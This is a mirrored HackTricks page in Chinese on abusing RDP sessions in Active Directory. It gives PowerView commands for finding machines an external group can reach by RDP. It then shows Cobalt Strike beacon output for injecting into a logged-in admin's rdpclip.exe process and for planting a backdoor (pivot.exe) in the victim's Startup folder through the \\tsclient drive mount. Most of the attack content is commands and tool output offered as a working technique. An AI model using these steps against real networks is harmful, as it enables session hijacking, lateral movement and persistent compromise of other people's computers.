mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 15:12:11 +00:00
5.8 KiB
5.8 KiB
RDP会话滥用
☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 YouTube 🎥
-
你在一家网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
-
发现我们的独家NFTs收藏品——The PEASS Family
-
加入💬 Discord群组或电报群组,或者关注我在Twitter上的🐦@carlospolopm。
-
通过向hacktricks仓库和hacktricks-cloud仓库提交PR来分享你的黑客技巧。
RDP进程注入
如果外部组对当前域中的任何计算机具有RDP访问权限,攻击者可以入侵该计算机并等待用户。
一旦用户通过RDP访问,攻击者可以转移到该用户的会话并滥用其在外部域中的权限。
# Supposing the group "External Users" has RDP access in the current domain
## lets find where they could access
## The easiest way would be with bloodhound, but you could also run:
Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
#or
Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName
# Then, compromise the listed machines, and wait til someone from the external domain logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin
# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
PID PPID Name Arch Session User
--- ---- ---- ---- ------- -----
...
4960 1012 rdpclip.exe x64 3 EXT\super.admin
beacon> inject 4960 x64 tcp-local
## From that beacon you can just run powerview modules interacting with the external domain as that user
查看此页面中的其他使用其他工具窃取会话的方法。
RDPInception
如果用户通过RDP访问一台被攻击者等待的机器,攻击者将能够在用户的RDP会话中注入一个信标,如果受害者在通过RDP访问时挂载了他的驱动器,攻击者就可以访问它。
在这种情况下,您可以通过在启动文件夹中写入后门来入侵受害者的原始计算机。
# Wait til someone logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin
# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
PID PPID Name Arch Session User
--- ---- ---- ---- ------- -----
...
4960 1012 rdpclip.exe x64 3 EXT\super.admin
beacon> inject 4960 x64 tcp-local
# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.
## \\tsclient\c is the C: drive on the origin machine of the RDP session
beacon> ls \\tsclient\c
Size Type Last Modified Name
---- ---- ------------- ----
dir 02/10/2021 04:11:30 $Recycle.Bin
dir 02/10/2021 03:23:44 Boot
dir 02/20/2021 10:15:23 Config.Msi
dir 10/18/2016 01:59:39 Documents and Settings
[...]
# Upload backdoor to startup folder
beacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
beacon> upload C:\Payloads\pivot.exe
☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
你在一家网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载HackTricks的PDF吗?请查看订阅计划!
-
发现我们的独家NFTs收藏品The PEASS Family
-
加入 💬 Discord群组 或 Telegram群组 或 关注我在Twitter上的🐦@carlospolopm.
-
通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。